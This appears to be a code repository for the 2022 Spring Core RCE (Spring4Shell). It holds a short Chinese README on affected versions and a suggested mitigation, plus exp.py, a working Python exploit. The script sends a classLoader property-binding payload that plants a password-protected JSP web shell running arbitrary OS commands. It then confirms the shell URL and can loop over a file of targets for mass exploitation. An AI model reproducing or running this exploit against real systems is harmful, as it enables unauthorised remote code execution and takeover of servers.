├── README.md ├── exp.py ├── images ├── img_1.png └── poc.png └── 漏洞分析.pdf /README.md: -------------------------------------------------------------------------------- 1 | # Spring Core RCE 2 | 3 | > 继 Spring Cloud 之后,3.29 日 ,网上爆出Spring 的又一重量级漏洞:Spring Core RCE 4 | 5 | ## 流传的打码poc 6 | **目前exp 已上传 ```exp.py```** 7 | ![流传的打码poc](images/poc.png) 8 | ![尴尬的局面](images/img_1.png) 9 | 10 | ## Spring 官方补丁也正在积极的赶制中 11 | [Spring 制作中的补丁链接](https://github.com/spring-projects/spring-framework/commit/7f7fb58dd0dae86d22268a4b59ac7c72a6c22529) 12 | 13 | ## 漏洞影响 14 | 1. jdk 版本在9及以上的 15 | 2. 使用了Spring Framework或衍生框架 16 | ## 漏洞修复建议 17 | 目前,Spring 官方暂未发布补丁,建议降低jdk 版本作为临时方案 -------------------------------------------------------------------------------- /exp.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | 3 | import requests 4 | import argparse 5 | from urllib.parse import urljoin 6 | 7 | def Exploit(url): 8 | headers = {"suffix":"%>//", 9 | "c1":"Runtime", 10 | "c2":"<%", 11 | "DNT":"1", 12 | "Content-Type":"application/x-www-form-urlencoded" 13 | 14 | } 15 | data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" 16 | try: 17 | 18 | go = requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False) 19 | shellurl = urljoin(url, 'tomcatwar.jsp') 20 | shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False) 21 | if shellgo.status_code == 200: 22 | print(f"漏洞存在,shell地址为:{shellurl}?pwd=j&cmd=whoami") 23 | except Exception as e: 24 | print(e) 25 | pass 26 | 27 | 28 | 29 | 30 | def main(): 31 | parser = argparse.ArgumentParser(description='Srping-Core Rce.') 32 | parser.add_argument('--file',help='url file',required=False) 33 | parser.add_argument('--url',help='target url',required=False) 34 | args = parser.parse_args() 35 | if args.url: 36 | Exploit(args.url) 37 | if args.file: 38 | with open (args.file) as f: 39 | for i in f.readlines(): 40 | i = i.strip() 41 | Exploit(i) 42 | 43 | if __name__ == '__main__': 44 | main() -------------------------------------------------------------------------------- /images/img_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mcdulltii/SpringShell_0-day/a989f66b8b8a9a1567dc5ec22bde5d75b1af42aa/images/img_1.png -------------------------------------------------------------------------------- /images/poc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mcdulltii/SpringShell_0-day/a989f66b8b8a9a1567dc5ec22bde5d75b1af42aa/images/poc.png -------------------------------------------------------------------------------- /漏洞分析.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mcdulltii/SpringShell_0-day/a989f66b8b8a9a1567dc5ec22bde5d75b1af42aa/漏洞分析.pdf --------------------------------------------------------------------------------